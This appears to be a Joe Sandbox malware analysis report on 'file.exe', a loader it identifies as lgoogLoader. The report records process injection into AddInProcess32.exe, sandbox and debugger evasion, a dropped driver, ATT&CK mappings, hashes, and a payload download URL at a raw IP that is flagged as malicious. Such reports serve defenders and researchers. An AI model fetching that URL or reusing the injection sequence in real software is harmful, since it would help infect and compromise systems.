Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe

API coverage: 5.9 %

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe

API call chain: ExitProcess graph end node

graph_7-7672

Source: AddInProcess32.exe, 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: VMware
Source: AddInProcess32.exe, 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: Chrome/HEADIsWow64Processkernel32X:\Windows\SysWOW64\ntdll.dllntdll.dllRtlInitUnicodeStringZwOpenFileZwCreateSectionZwMapViewOfSectionNtUnmapViewOfSectionNtQueryInformationProcess{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}RtlRandomExntdll:y--\Driver\Device ParametersEDID(IsActive)(NotActive)BAD EDID!No EDID!--Nm:SYSTEM\ControlSet001\Enum\DISPLAY\\.\PhysicalDrive%d---VMwareVirtualBoxVBoxQEMUDisplay AdapterNon-PnPVMwareVirtualBoxVBoxQEMUWestern Disk HARDDISK(1):(2):text/*Mozilla / 5.0 (SymbianOS / 9.1; U; [en]; SymbianOS / 91 Series60 / 3.0) AppleWebkit / 413 (KHTML, like Gecko) Safari / 413

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe

Code function: 7_2_00405700 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

7_2_00405700

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe

7_2_00402CB0

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe

Code function: 7_2_004039C0 GetStartupInfoA,GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__amsg_exit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__amsg_exit,__setenvp,__amsg_exit,__cinit,__amsg_exit,__wincmdln,

7_2_004039C0

Source: C:\Users\user\Desktop\file.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 7_2_00407219 SetUnhandledExceptionFilter,	7_2_00407219
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 7_2_00405700 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00405700
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 7_2_0040C52A _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_0040C52A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 7_2_02B53C44 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_02B53C44

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 40D000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 413000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 416000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 418000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: A98008	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe

Code function: 7_2_02B522F0 GetProcessHeap,HeapAlloc,StrCatW,StrCatW,StrCatW,StrCatW,CreateProcessW,GetThreadContext,GetProcessHeap,HeapAlloc,VirtualQueryEx,WriteProcessMemory,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,TerminateProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

7_2_02B522F0

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe

7_2_00402050

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe

Code function: GetLocaleInfoA,

7_2_0040B123

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe

Code function: 7_2_0040C66D cpuid

7_2_0040C66D

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe

Code function: 7_2_00407ACC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

7_2_00407ACC

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe

7_2_004039C0

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Valid Accounts	2 Native API	1 Valid Accounts	1 Valid Accounts	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	2 Windows Service	1 Exploitation for Privilege Escalation	1 Valid Accounts	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	1 Bootkit	1 Access Token Manipulation	1 Access Token Manipulation	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	2 LSASS Driver	2 Windows Service	1 Disable or Modify Tools	NTDS	121 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	311 Process Injection	121 Virtualization/Sandbox Evasion	LSA Secrets	34 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	2 LSASS Driver	311 Process Injection	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Deobfuscate/Decode Files or Information	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	11 Obfuscated Files or Information	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Bootkit	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	11 Software Packing	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	14%	ReversingLabs	Win64.Trojan.CrypterX
file.exe	20%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\?????.sys	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\?????.sys	1%	Virustotal		Browse

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.file.exe.1c5babf0000.0.unpack	100%	Avira	HEUR/AGEN.1363250	Download File
7.2.AddInProcess32.exe.400000.0.unpack	100%	Avira	TR/Patched.Gen	Download File
7.2.AddInProcess32.exe.2b50000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen3	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.sysinternals.comopen/?ICONSHELLRUNASAboutUsage/raw/netonlyRunAsInvoker__COMPAT_LAYERcmd	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
https://www.sysinternals.com0	0%	URL Reputation	safe
http://109.206.241.33/files/1un.config.CfgEncFile	17%	Virustotal		Browse
http://109.206.241.33/files/1un.config.CfgEncFile	100%	Avira URL Cloud	malware
http://109.206.241.33/files/1un.config.CfgEncFileMZ	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

⊘No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://109.206.241.33/files/1un.config.CfgEncFile	AddInProcess32.exe	false	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.sysinternals.com	AddInProcess32.exe	false		high
http://www.sysinternals.comopen/?ICONSHELLRUNASAboutUsage/raw/netonlyRunAsInvoker__COMPAT_LAYERcmd	AddInProcess32.exe, 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	file.exe	false	URL Reputation: safe	unknown
https://sectigo.com/CPS0	file.exe	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0	file.exe	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	file.exe	false	URL Reputation: safe URL Reputation: safe	unknown
https://www.sysinternals.com0	?????.sys.0.dr	false	URL Reputation: safe	unknown
http://109.206.241.33/files/1un.config.CfgEncFileMZ	AddInProcess32.exe, 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 00000007.00000002.392608147.0000000002B40000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	37.1.0 Beryl
Analysis ID:	862324
Start date and time:	2023-05-09 17:28:16 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	file.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@15/2@0/0
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 59.8% (good quality ratio 55.9%) Quality average: 75.4% Quality standard deviation: 30.2%
HCA Information:	Successful, ratio: 100% Number of executed functions: 9 Number of non-executed functions: 42
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\?????.sys	Ref_PO#29968.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	lgoogLoader	Browse
	HSCANNER.exe	Get hash	malicious	FormBook	Browse
	HSBC_Bank_MT_103_Transfer_Copy_PDF.exe	Get hash	malicious	AgentTesla	Browse
	Weekly_stock_list_0805.exe	Get hash	malicious	AgentTesla	Browse
	file.exe	Get hash	malicious	lgoogLoader	Browse
	fBXNicB12R.exe	Get hash	malicious	lgoogLoader	Browse
	file.exe	Get hash	malicious	lgoogLoader	Browse
	a.exe	Get hash	malicious	Amadey, AveMaria, Nitol, RedLine, Remcos, SmokeLoader, UACMe	Browse
	file.exe	Get hash	malicious	lgoogLoader	Browse
	m6JO0XiaWy.exe	Get hash	malicious	lgoogLoader	Browse
	file.exe	Get hash	malicious	lgoogLoader	Browse
	O8GyuZeT3P.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	lgoogLoader	Browse
	file.exe	Get hash	malicious	lgoogLoader	Browse
	nMIdIHOO7E.exe	Get hash	malicious	Amadey, RedLine	Browse
	file.exe	Get hash	malicious	lgoogLoader	Browse
	file.exe	Get hash	malicious	lgoogLoader	Browse
	Narud#U017eba_za_26.04.2023..exe	Get hash	malicious	FormBook	Browse
	file.exe	Get hash	malicious	lgoogLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.log

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1461
Entropy (8bit):	5.375805902953795
Encrypted:	false
SSDEEP:	24:ML9E4KrL1qE4GiD0E4KeGiKDE4KGKN08AKhgLE4qXKIE4TKD1KoZAE4KKPaE4j:MxHKn1qHGiD0HKeGiYHKGD8AogLHitHa
MD5:	FC337EAC93C651C01D02B16E6905B397
SHA1:	08320670A665B3FC68812A0E1B318EE7CBCE5FC7
SHA-256:	695A51EE0DEB584A229313C044E5C00B77DF6DD53CCF0059E9B59729F425BA9C
SHA-512:	DCE9712EBCCAC70000AD03055531EA9B3ED32C8017AEB0C40BDCE823C04DD3821B3C204B95AEDAF34A1C51FCCDE50A5F5C891686540E951B05D4BE2EE5A9BD6C
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=

C:\Users\user\AppData\Local\Temp\?????.sys

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36208
Entropy (8bit):	6.284053631838433
Encrypted:	false
SSDEEP:	768:tKCM0IWRhm8LiES4cT4iZ923OMqUD6Q4KICJw4:t7/Vhzb3pL4GJw4
MD5:	97E3A44EC4AE58C8CC38EEFC613E950E
SHA1:	BC47E15537FA7C32DFEFD23168D7E1741F8477ED
SHA-256:	440883CD9D6A76DB5E53517D0EC7FE13D5A50D2F6A7F91ECFC863BC3490E4F5C
SHA-512:	8EF7FC489B6FFED9EC14746E526AE87F44C39D5EAFFF0D4C3BFA0B3F0D28450F76D1066F446C766F4C9A20842A7F084FE4A9F94659D5487EA88959FCCB2A96EB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Joe Sandbox View:	Filename: Ref_PO#29968.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: HSCANNER.exe, Detection: malicious, Browse Filename: HSBC_Bank_MT_103_Transfer_Copy_PDF.exe, Detection: malicious, Browse Filename: Weekly_stock_list_0805.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: fBXNicB12R.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: a.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: m6JO0XiaWy.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: O8GyuZeT3P.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: nMIdIHOO7E.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: Narud#U017eba_za_26.04.2023..exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3...w.{.w.{.w.{.~...p.{.w.z.H.{.~...t.{.~...t.{.~...t.{."...v.{."..v.{.".y.v.{.Richw.{.........PE..d...l..a.........." .....L..........X.......................................................................................................x...(............`.......l..p!......0....I..T............................................@...............................text....%.......&.................. ..h.rdata.......@.......*..............@..H.data...,....P.......:..............@....pdata.......`.......<..............@..HPAGE.........p.......@.............. ..`INIT.................\.............. ..b.rsrc................f..............@..B.reloc..0............j..............@..B................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	4.25642365152462
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	file.exe
File size:	1338216
MD5:	851dfeb9035473532d796a9b41608b3c
SHA1:	beca84bb1ffd0146f8e5b87a01b14b42e8d50e2b
SHA256:	5867c5321292565fa017f4e88b6c4894572d7fa557e9a0ddb1ced4362413b6b3
SHA512:	4768571679e045a2dbcb80ffe1dab9f97bc4c17ccb2cb2f2e8598e0afebaa7443b8ca027763cce7643def7321a63692b053ee5a9d17d0ac04a160ba8ed0f83f7
SSDEEP:	12288:GbnXLRzlUCodzOurH+pRCK4ZLnfbygqOpOFXZ4NdbEfEruuDavFUWY5A3IRQgnnt:GrtqRUZYSh8t7ejqQLeCYCBuQ1vr3c
TLSH:	ED5549343AFA502AB173EFA54AE479E6DA6FB7733B07641D109103864723A41EDC193E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....EYd.........."...0.uG..r............ ....@...... ...............................O....`................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6459450E [Mon May 8 18:53:02 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Authenticode Signature

Signature Valid:	false
Signature Issuer:	C=CN, CN=upwork Ltd
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	5/9/2023 4:24:15 PM 5/9/2024 4:24:15 PM
Subject Chain	C=CN, CN=upwork Ltd
Version:	3
Thumbprint MD5:	A86456CED00CE864F111465433283811
Thumbprint SHA-1:	63D1D89606D2435239469D3297AE241286EFECF1
Thumbprint SHA-256:	B7685122944B6F0B2D1D9CE39052B0828E9DF559E202EC48CCAFA4ED02538262
Serial:	432AD609F49E1629E7D765061BCE3A61

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x148000	0x872	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x145400	0x1768
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1466ec	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x144775	0x144800	False	0.46086527349768874	data	4.225065680038577	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x148000	0x872	0xa00	False	0.3484375	data	3.5753513989958745	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x1480a0	0x5e8	data
RT_MANIFEST	0x148688	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

Network Behavior

⊘No network behavior found

Statistics

Click to jump to process

Memory Usage

• file.exe
• jsc.exe
• mscorsvw.exe
• aspnet_compiler.exe
• RegSvcs.exe
• dfsvc.exe
• aspnet_regbrowsers.exe
• AddInProcess32.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry

Click to dive into process behavior distribution

Behavior

• file.exe
• jsc.exe
• mscorsvw.exe
• aspnet_compiler.exe
• RegSvcs.exe
• dfsvc.exe
• aspnet_regbrowsers.exe
• AddInProcess32.exe

Click to jump to process

System Behavior

Analysis Process: file.exePID: 6596, Parent PID: 3528

Function Logs

General

Target ID:	0
Start time:	17:29:12
Start date:	09/05/2023
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x1c5babf0000
File size:	1338216 bytes
MD5 hash:	851DFEB9035473532D796A9B41608B3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Show Windows behavior

File Activities

File Opened

File Created

File Written

File Read

File Attributes Queried

Device IO

Show Windows behavior

Section Activities

Sections loaded by Windows

Sections loaded by Program

Show Windows behavior

Registry Activities

Key Opened

Key Created

Key Value Created

Key Value Queried

Key Value Enumerated

Key Enumerated

Show Windows behavior

Mutex Activities

Mutex Created

Show Windows behavior

Process Activities

Process Created

Process Queried

Process Information Set

Process Terminated

Show Windows behavior

Thread Activities

Thread Created

Thread Execution Resumed

Thread Execution Suspended

Thread Delayed

Thread Information Set

Show Windows behavior

Memory Activities

Memory Written

Memory Allocated

Memory Protection Changed

Memory Usage Statistics

Driver Activities

Driver Loaded

Show Windows behavior

System Activities

Language or Locale ID Queried

System Information Queried

Show Windows behavior

Timing Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Windows UI Activities

Window Created

Message Posted to Windows UI

Function Logs

General

Target ID:	7
Start time:	17:29:50
Start date:	09/05/2023
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
Imagebase:	0x9b0000
File size:	42080 bytes
MD5 hash:	F2A47587431C466535F3C3D3427724BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_lGoogLoader, Description: Yara detected lgoogLoader, Source: 00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

File Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Section Activities

Sections loaded by Windows

Sections loaded by Program

